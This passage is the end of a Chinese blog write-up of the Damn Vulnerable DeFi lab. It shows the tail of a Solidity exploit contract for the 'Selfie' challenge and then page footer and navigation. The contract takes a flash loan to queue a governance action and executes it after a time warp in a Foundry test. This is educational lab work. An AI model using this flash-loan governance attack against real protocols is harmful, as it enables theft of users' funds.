(recovery)));</span><br><span class="line">        return CALLBACK_SUCCESS;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function step1() public &#123;</span><br><span class="line">        pool.flashLoan(this, address(token), TOKENS_IN_POOL, &quot;&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function step2() public &#123;</span><br><span class="line">        governance.executeAction(actionId);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function test_selfie() public checkSolvedByPlayer &#123;</span><br><span class="line">    Expoliter expoliter = new Expoliter(token, governance, pool, recovery);</span><br><span class="line">    expoliter.step1();</span><br><span class="line">    vm.warp(block.timestamp + 2 days);</span><br><span class="line">    expoliter.step2();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>HeyGap
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://heygap.github.io/2024/08/26/blockchain%20-%20DVD%E9%9D%B6%E5%9C%BA%E5%A4%8D%E7%8E%B0/" title="blockchain - Damn Vulnerable Defi 靶场复现">http://heygap.github.io/2024/08/26/blockchain - DVD靶场复现/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <div>
        
          <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------文章就到这里啦！<i class="fa fa-paw"></i>感谢您的阅读XD-------------</div>
    
</div>
        
      </div>

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Blockchain/" rel="tag"># Blockchain</a>
              <a href="/tags/Smart-Contract/" rel="tag"># Smart Contract</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/08/20/blockchain%20-%202024%E5%90%88%E7%BA%A6%E6%BC%8F%E6%B4%9E%E7%B1%BB%E5%9E%8B%E6%B1%87%E6%80%BB%EF%BC%88%E6%9B%B4%E6%96%B0%E4%B8%AD%EF%BC%89/" rel="prev" title="blockchain - 2024合约漏洞类型汇总（更新中）">
      <i class="fa fa-chevron-left"></i> blockchain - 2024合约漏洞类型汇总（更新中）
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/08/27/CSBasics%20-%20NJU_Program_Analysis_Node/" rel="next" title="CSBasics - NJU_Program_Analysis_Node">
      CSBasics - NJU_Program_Analysis_Node <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E8%AE%BE%E7%BD%AE"><span class="nav-number">1.</span> <span class="nav-text">[0] 环境设置</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#unstoppable"><span class="nav-number">2.</span> <span class="nav-text">[1] Unstoppable</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#naivereceiver"><span class="nav-number">3.</span> <span class="nav-text">[2] NaiveReceiver</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#truster"><span class="nav-number">4.</span> <span class="nav-text">[3] Truster</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#side-entrance"><span class="nav-number">5.</span> <span class="nav-text">[4] Side Entrance</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#the-rewarder"><span class="nav-number">6.</span> <span class="nav-text">[5] The Rewarder</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#selfie"><span class="nav-number">7.</span> <span class="nav-text">[6] Selfie</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="HeyGap"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">HeyGap</p>
  <div class="site-description" itemprop="description">An undergraduate student of Cybersecurity at SDU.</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">24</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="sidebar-button motion-element"><i class="fa fa-comment"></i>
    Chat
  </a>
  </div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/HeyGap" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;HeyGap" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/2310769056@qq.com" title="E-Mail → 2310769056@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">HeyGap</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script color='0,0,0' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest-nomobile.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

  

</body>
</html>
